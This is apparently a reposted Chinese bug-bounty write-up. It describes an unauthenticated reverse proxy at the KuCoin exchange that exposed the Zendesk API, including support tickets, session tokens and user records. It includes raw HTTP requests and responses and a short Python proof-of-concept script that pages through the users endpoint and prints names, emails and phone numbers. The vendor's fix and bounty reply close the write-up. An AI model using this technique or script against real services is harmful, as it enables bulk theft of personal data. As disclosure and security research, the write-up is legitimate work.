最近,一家名为KuCoin的加密货币交易所发布了高达100万美元的漏洞发现赏金,他们在HackenProof的漏洞赏金平台上托管。
作为Web狗,我测试新目标的方法很简单:
1.通过Burp Suite代理浏览器流量抓包
2.单击所可能涉及Web应用程序并了解其功能和框架
3.分析Burp Suite中记录的HTTP请求
设置好burp代理,我从注册部分开始测起,跳过很多无用的部分,我发现了这个包:
GET /_api/zendesk/api/v2/help_center/en-us/articles/6545352890265.json HTTP/2
Host: www.kucoin.com
Connection: close
Zendesk是一个客户服务平台,允许企业管理客户支持相关问题,请求中有两个API调用: /_api/zendesk 和 /api/v2/ ,看着像Zendesk API的反向代理,回包如下:
{
"data": {
"article": {
"id": 6545352890265,
"url": "https://kucoin.zendesk.com/api/v2/help_center/en-us/articles/6545352890265.json",
"html_url": "https://kucoin.zendesk.com/hc/en-us/articles/6545352890265-Change-Login-Password",
"author_id": 903637920486,
"comments_disabled": true,
"draft": false,
"promoted": false,
"position": 0,
"vote_sum": 1,
"vote_count": 3,
"section_id": 6632289240345,
"created_at": "2022-05-12T12:33:28Z",
"updated_at": "2023-02-07T04:08:29Z",
"name": "Change Login Password",
"title": "Change Login Password",
"source_locale": "en-us",
"locale": "en-us",
"outdated": false,
"outdated_locales": [],
"edited_at": "2022-06-08T14:37:58Z",
"user_segment_id": null,
"permission_group_id": 830894,
"content_tag_ids": [],
"label_names": [],
"body": "<table class="wrapped confluenceTable">n<tbody>n<tr>n<td class="confluenceTd">1. Can't Receive Email/SMS Verification Code</td>n</tr>n<tr>n<td class="confluenceTd">n<a class="external-link" href="https://support.kucoin.plus/hc/en-us/articles/360015206853-Cannot-Receive-Email-Code-SMS-message" rel="nofollow">https://support.kucoin.plus/hc/en-us/articles/360015206853-Cannot-Receive-Email-Code-SMS-message</a><br>Please check the messages in your frequently used phone number or email that you may have used for registration. There shall be an notification when you complete the registration. Then use the correct account to reset password.</td>n</tr>n<tr>n<td class="confluenceTd">2. Still Unable to Log in After Resetting the Login Password</td>n</tr>n<tr>n<td class="confluenceTd">Please retry after clearing the cache or switch the browser. If you're still unable to log in, please make sure you input it in the correct format; please exclude the country code, e.g., for +82 123456, enter '123456' only, or try to remove/add 0 before your phone number and try again.</td>n</tr>n</tbody>n</table>"
}
},
"success": true
}
它会转发 /_api/zendesk/api/v2/* 下的所有路径
GET /_api/zendesk/api/v2/ HTTP/2
Host: www.kucoin.com
Connection: close
{
"data":
" n
<html dir="ltr" lang="en-US">n<head>n
<meta charset="utf-8" />n
<!-- v22727 -->nn
<title>The page you were looking for doesn't exist – KuCoin Help Center</title>nn nn
<meta name="robots" content="noindex, nofollow, noarchive, nosnippet">nn
<link rel="stylesheet" href="//static.zdassets.com/hc/assets/application-4457e15fd2317df56adee04580b8726d.css" media="all" id="stylesheet" />n
<link rel="stylesheet" type="text/css" href="//p25.zdassets.com/hc/theming_assets/2196095/360000017594/style.css?digest=9096602929177">nn
<link rel="icon" type="image/x-icon" href="//theme.zdassets.com/theme_assets/2196095/8ea3012f8759412bafaffd7d07248ed1e75d8afa.ico" />nn
<script>nwindow.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;nga('create', 'UA-46608064-13', 'auto');nga('send', 'pageview');n
</script>n<script async src='https://www.google-analytics.com/analytics.js'></script>nn nn
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>n---SNIP---"
}
我查看了API文档,发现了以下内容:
You must be a verified user to make API requests. You can authorize against the API using either basic authentication with your email address and password, with your email address and an API token, or with an OAuth access token.
您必须是经过验证的用户才能发出API请求。您可以使用您的电子邮件地址和密码、您的电子邮件地址和API令牌或OAuth访问令牌进行基本身份验证来对API进行授权。
所以,Zendesk API要求进行身份验证,KuCoin正在代理任何请求到Zendesk API—->>我们可以直接以KuCoin认证用户的身份使用API。
我继续测试并发现了api有tickets接口,用于列出和搜索tickets,
GET /_api/zendesk/api/v2/tickets.json HTTP/2
Host: www.kucoin.com
Connection: close
HTTP/2 200 OK
Date: Tue, 18 Apr 2023 17:12:51 GMT
Content-Type: application/json
-- snip --
{
"data": {
"tickets": [{
"url": "https://kucoin.zendesk.com/api/v2/tickets/285403.json",
"id": 285403,
"external_id": null,
"via": {
"channel": "email",
"source": {
"from": {
"address": "[email protected]",
"name": "Poloniex US"
},
"to": {
"name": "KuCoin",
"address": "[email protected]"
},
"rel": null
}
},
--- snip ---
"next_page":"https://kucoin.zendesk.com/api/v2/tickets.json?page=2",
"previous_page":null,
"count":276479
整理发现,Zendesk中有276479个tickets,包含敏感信息- PII(附件中的KYC信息),会话令牌,IP地址,帐户信息等
更有趣的是,有一个 search.json 接口允许搜索tickets。
其中包括会话令牌:
也发现了其它可利用的问题接口
窃取用户信息:
GET /_api/zendesk/api/v2/users.json HTTP/2
Host: www.kucoin.com
Connection: close
这个接口泄露了所有用户的姓名、电子邮件、电话号码等,还很贴心的支持分布。
写了一个简单的利用脚本证明了问题:
BASE_URL = 'https://www.kucoin.com/_api/zendesk/api/v2/'
def get_all_zendesk_users(dump=False):
page = BASE_URL + "/users.json"
while True:
r = requests.get(page)
dat = r.json().get('data')
users = dat.get('users')
for u in users:
print(f"{u['name']}, {u['email']}, {u['phone']}, {u['role']}")
if dump:
if dat.get('next_page') is None:
break
parsed_url = urlparse(dat.get('next_page'))
query_params = parse_qs(parsed_url.query)
page = query_params.get('page', [None])[0]
page = f"{BASE_URL}/users.json?page={page}"
else:
break
get_all_zendesk_users(dump=True)
这个漏洞导致可以使用Zendesk API文档中指定的任何接口https://developer.zendesk.com/api-reference/
漏洞成因为 https://kucoin.com/_api/zendesk/api/v2 通过admin权限验证反向代理到https://kucoin.zendesk.com/api/v2/
最后只得到了5000$,官方是这样的:
Hi Sir: The issue has been fixed. After the team discussion, the current results are as follows: Impact of information leakage: some user names and mailbox data are leaked (not everyone uses zendesk, so the amount of leaks is limited). So Vulnerability rating does not reach critical, rated as high Bounty detail: Information leakage bonus 2000$, zendesk API unauthorized access bonus 3000$. Final Total bonus is 5000$
你好,问题已经解决了。经过团队讨论,目前结果如下:信息泄露的影响:一些用户名和邮箱数据被泄露(不是每个人都使用Zendesk,所以泄露的数量有限)。因此,漏洞评级未达到临界,评级为高赏金详细信息:信息泄露奖励2000$,zendesk API未授权访问奖励3000$。最终总奖金为5000美元
原文始发于微信公众号(军机故阁):5000$加密货币交易所KuCoin漏洞